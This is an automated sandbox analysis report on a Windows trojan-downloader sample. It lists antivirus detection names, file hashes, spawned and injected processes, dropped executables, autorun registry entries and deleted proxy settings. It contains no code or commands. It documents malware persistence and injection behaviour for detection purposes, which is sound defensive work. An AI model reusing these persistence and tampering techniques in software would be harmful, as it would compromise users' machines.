Gen.Variant.Application.AdLoad.49_0861e59c41
Trojan-Downloader.MSIL.Steamilik.zef (Kaspersky), Gen:Variant.Application.AdLoad.49 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, SpyTool.Win32.Ardamax.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 0861e59c41bb5f407dacedf51edab54f
SHA1: 947872652cd00324bbc9823a80d1571ecf7ea9bf
SHA256: e611bc723a644a830e294e30f20846eb06301beb82c585e1a2eeee41b72b18cb
SSDeep: 6144:x/QiQPX/SJZVpdtyhvOr7dJ p5QRYelwdOgNsoIVYIHq xKH9xErOdGw6h:pQiGPYZVpXyVOvdJ p5QRYOwhNvISIH9
Size: 385595 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: Lefif
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
cas.exe:3804
W15R20Q1Q1.exe:1980
%original file name%.exe:4008
wincom_FYV.exe:192
W15R20Q1Q1.tmp:2228
8G0VBB.exe:2788
R3VW2WN639.exe:2760
The Trojan injects its code into the following process(es):
9VW7H7KFES.exe:544
caster.exe:3788
8G0VBB.exe:2704
setup.exe:2104
advise.exe:3996
0861e59c41bb5f407dacedf51edab54f.tmp:2084
R3VW2WN639.exe:1668
50U0P6CTE.exe:2996
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process cas.exe:3804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe.config (1 bytes)
%Program Files%\YW6DQ3G9K4\uninstaller.exe.config (1 bytes)
%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe (20404 bytes)
%Program Files%\YW6DQ3G9K4\uninstaller.exe (196 bytes)
The process 9VW7H7KFES.exe:544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
The process caster.exe:3788 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\cast.config (37 bytes)
The process W15R20Q1Q1.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp\W15R20Q1Q1.tmp (1415 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-GQPFO.tmp\W15R20Q1Q1.tmp (0 bytes)
The process %original file name%.exe:4008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-SGBAU.tmp\0861e59c41bb5f407dacedf51edab54f.tmp (1414 bytes)
The process wincom_FYV.exe:192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp (78068 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\gch8FD3.tmp (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tuto_monetize_120161205\tuto_monetize_120161205\2.00\cnf.cyl (144 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp-shm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\mfi8FD2.tmp-wal (0 bytes)
The process W15R20Q1Q1.tmp:2228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\mpck\unins000.dat (1374 bytes)
%Program Files%\mpck\is-9N7HB.tmp (23473 bytes)
%Program Files%\mpck\is-FHO2R.tmp (23062 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup\_shfoldr.dll (47 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-8IB5S.tmp\_isetup\_shfoldr.dll (0 bytes)
The process 8G0VBB.exe:2704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\asasa.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe (19468 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\advise.exe (145773 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\asasa.exe (208 bytes)
%Program Files%\mpck\config.conf (35 bytes)
The process setup.exe:2104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\mpck\wincom_FYV.exe (335632 bytes)
%Program Files%\mpck\uninstaller.exe (66563 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\W15R20Q1Q1.exe (81615 bytes)
%Program Files%\mpck\8G0VBB.exe (49754 bytes)
The process advise.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe (7853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe (26266 bytes)
The process 0861e59c41bb5f407dacedf51edab54f.tmp:2084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\idp.dll (1493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\setup.exe (130856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UB5BL.tmp\_isetup\_shfoldr.dll (47 bytes)
The process R3VW2WN639.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\appsoft.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\appsoft.exe (218209 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe (744 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\asasa.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\X2SHWRQAUY\cas.exe.config.config (1 bytes)
The process 50U0P6CTE.exe:2996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\YW6DQ3G9K4\cast.config (37 bytes)
Registry activity
The process cas.exe:3804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cas_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 9VW7H7KFES.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASMANCS]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\9VW7H7KFES_RASAPI32]
"FileTracingMask" = "4294901760"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"N5WHVTE233" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\9VW7H7KFES.exe"
The process caster.exe:3788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\caster_RASAPI32]
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VA5YBTJ0T5" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\HL61WCNCNZ\caster.exe"
The process wincom_FYV.exe:192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
The process W15R20Q1Q1.tmp:2228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"MajorVersion" = "1"
[HKCU\Software\Microsoft\RestartManager\Session0001]
"SessionHash" = "2C EE CA 40 BF 08 19 2A 96 40 4F 52 10 63 E5 31"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"Inno Setup: User" = "%CurrentUserName%"
"Inno Setup: Language" = "english"
"InstallLocation" = "%Program Files%\mpck\"
"DisplayVersion" = "1.1"
"Inno Setup: App Path" = "%Program Files%\mpck"
"QuietUninstallString" = "%Program Files%\mpck\unins000.exe /SILENT"
[HKCU\Software\Microsoft\RestartManager\Session0001]
"RegFilesHash" = "DD E4 9A 3E A8 25 1B D7 0D 6C 4E D0 F3 49 A4 64"
"RegFiles0000" = "%Program Files%\mpck\mobilepcstarterkit_widget.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"MinorVersion" = "1"
"EstimatedSize" = "3922"
"DisplayName" = "mpck version 1.1"
"Inno Setup: Icon Group" = "mpck"
"Publisher" = "mobilepcstarterkit"
[HKCU\Software\Microsoft\RestartManager\Session0001]
"Owner" = "B4 08 00 00 21 76 2F F7 20 4F D2 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"Inno Setup: Setup Version" = "5.5.4 (a)"
"NoRepair" = "1"
[HKCU\Software\Microsoft\RestartManager\Session0001]
"Sequence" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"InstallDate" = "20161205"
"NoModify" = "1"
"UninstallString" = "%Program Files%\mpck\unins000.exe"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\RestartManager\Session0001]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0001]
"SessionHash"
"Owner"
"RegFiles0000"
"Sequence"
"RegFilesHash"
The process 8G0VBB.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\8G0VBB_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OTUTPRODUCT_6NAS9" = "%Program Files%\mpck\8G0VBB.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 8G0VBB.exe:2788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process setup.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\otut]
"partner" = "ref015"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\otut]
"Product" = "mpck"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\otut]
"channel" = "2"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DMunversion]
"Version" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mobilepcstarterkit_is1]
"UninstallString" = "%Program Files%\mpck\uninstaller.exe"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WINCOMFYV" = "%Program Files%\mpck\wincom_FYV.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process advise.exe:3996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\wewewe]
"Product" = "diskpower"
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\wewewe]
"channel" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\advise_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 0861e59c41bb5f407dacedf51edab54f.tmp:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"
[HKCU\Software\Microsoft\RestartManager\Session0000]
"SessionHash" = "EF 6A 23 D9 4F EE F1 22 55 82 3C F3 E2 22 B9 E0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "60 2C 1D EF 20 4F D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\0861e59c41bb5f407dacedf51edab54f_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\RestartManager\Session0000]
"Owner" = "24 08 00 00 2F A6 77 F8 20 4F D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionTime" = "60 2C 1D EF 20 4F D2 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process R3VW2WN639.exe:2760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process R3VW2WN639.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\R3VW2WN639_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_COMG6" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\R3VW2WN639.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 50U0P6CTE.exe:2996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\50U0P6CTE_RASMANCS]
"EnableFileTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"JQRO84EYHS" = "%Program Files%\YW6DQ3G9K4\50U0P6CTE.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 845d20f846a554990ea363a54ece3f2e | c:\Program Files\YW6DQ3G9K4\50U0P6CTE.exe |
| cca9ddf06ad02fad966a2bc4e8d877fd | c:\Program Files\YW6DQ3G9K4\uninstaller.exe |
| cfc88093734f861b7680de1e6aaf090f | c:\Program Files\mpck\8G0VBB.exe |
